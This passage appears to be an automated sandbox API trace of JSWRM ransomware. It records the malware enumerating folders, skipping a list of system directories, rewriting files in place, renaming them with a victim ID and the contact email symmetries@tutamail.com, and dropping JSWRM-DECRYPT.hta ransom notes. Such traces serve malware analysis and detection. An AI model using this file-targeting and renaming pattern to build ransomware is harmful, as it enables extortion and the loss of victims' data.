lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.665] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.665] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.665] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0058.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0058.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0058.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0058.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.665] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.665] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0058.665] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0058.666] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0058.666] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0058.666] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0058.666] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0058.666] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0058.666] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0058.666] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0058.666] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0058.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0058.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0058.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0058.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0058.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0058.666] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.671] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=60816) returned 1 [0058.671] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xed90) returned 0x2471a8 [0058.671] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0xed90, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0xed90, lpOverlapped=0x0) returned 1 [0058.677] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.677] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0xed90, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0xed90, lpOverlapped=0x0) returned 1 [0058.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.678] CloseHandle (hObject=0x3d4) returned 1 [0058.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0058.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0058.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0058.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0058.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0058.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0058.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0058.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0058.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.680] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0058.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0058.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0058.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0058.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0058.681] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.681] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0058.681] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0058.681] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0058.681] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0058.681] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0058.681] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0058.681] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0058.681] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0058.681] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0058.681] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0058.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0058.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0058.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2413a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0058.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0058.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0058.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0058.682] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.682] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0058.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0058.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0058.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.682] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1029", cAlternateFileName="")) returned 1 [0058.682] lstrcmpiW (lpString1="1029", lpString2=".") returned 1 [0058.682] lstrcmpiW (lpString1="1029", lpString2="..") returned 1 [0058.682] lstrcmpiW (lpString1="1029", lpString2="...") returned 1 [0058.682] lstrcmpiW (lpString1="1029", lpString2="windows") returned -1 [0058.682] lstrcmpiW (lpString1="1029", lpString2="recovery") returned -1 [0058.682] lstrcmpiW (lpString1="1029", lpString2="perflogs") returned -1 [0058.682] lstrcmpiW (lpString1="1029", lpString2="documents and settings") returned -1 [0058.682] lstrcmpiW (lpString1="1029", lpString2="$RECYCLE.BIN") returned 1 [0058.682] lstrcmpiW (lpString1="1029", lpString2="system volume information") returned -1 [0058.682] lstrcmpiW (lpString1="1029", lpString2="msocache") returned -1 [0058.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0058.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225bb0 [0058.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0058.683] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1029\\jswrm-decrypt.hta")) returned 0xffffffff [0058.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225bb0 | out: hHeap=0x1e0000) returned 1 [0058.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0058.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0058.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0058.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2266b0 [0058.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0058.684] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1029\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0058.686] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.686] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0058.687] CloseHandle (hObject=0x450) returned 1 [0058.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2266b0 | out: hHeap=0x1e0000) returned 1 [0058.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0058.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0058.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0058.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225fb0 [0058.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0058.687] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1029\\jswrm-decrypt.hta")) returned 0x20 [0058.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225fb0 | out: hHeap=0x1e0000) returned 1 [0058.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0058.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0058.688] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19a4ada6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0058.688] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.688] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19a4ada6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0058.688] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.688] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.688] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.688] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0058.688] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0058.688] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0058.688] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0058.688] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0058.688] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0058.688] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0058.688] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0058.688] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0058.688] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0058.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0058.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0058.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0058.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0058.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0058.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0058.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.689] WideCharToMultiByte (in: 